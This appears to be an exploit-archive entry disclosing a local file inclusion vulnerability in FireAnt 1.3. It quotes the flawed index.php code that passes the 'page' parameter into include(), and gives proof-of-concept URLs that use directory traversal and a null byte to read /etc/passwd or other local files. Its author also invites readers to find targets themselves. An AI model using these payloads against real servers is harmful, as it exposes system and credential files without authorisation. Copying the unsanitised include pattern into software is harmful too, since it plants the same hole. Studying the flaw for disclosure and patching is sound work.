id: 3232
date: 06/19/2008
title: FireAnt 1.3 (index.php page) Local File Inclusion Vulnerability
author: cOndemned
cves: 

===============================================================
FireAnt 1.3 (index.php page) Local File Inclusion Vulnerability
===============================================================



###################################################################################
#
#   Name   : FireAnt v1.3 Local File Inclusion Vulnerability
#   Author : cOndemned
#   Dork   : use Your brain (:
#
###################################################################################

Source :

    // index.php

    8.      $page = "bug_list"; //default page
    9.      if (!empty($_GET['page'])) {
    10.         $page = strip_tags($_GET['page']);
    
    99.             if (file_exists("./".$page.".php")) { 
    
    104.                include("./".$page.".php"); 

    
Proof of Concept :

    http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
    http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00



#  0day.today [2023-03-27]  #